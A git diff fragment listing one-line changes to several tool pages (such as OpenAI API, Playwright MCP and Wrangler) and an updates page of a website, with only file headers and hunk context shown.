                  diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index b5b70ae..b717fbb 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

                  Playwright MCP

                  diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index 226bd85..cc49f23 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index d2b6b07..59e65bd 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index df9fb37..546b067 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

                  Strudel Studio

                  diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index dbd10d1..0d7dbc5 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index a5b9964..741d63b 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

                  Canvas Planner

                  diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 2bf1dc5..32cd6f1 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

                  Playwright MCP

                  diff --git a/updates/index.html b/updates/index.html index a824e2d..63d8716 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

                  Wrangler 4.58.0 improved command grouping and auth ergonomics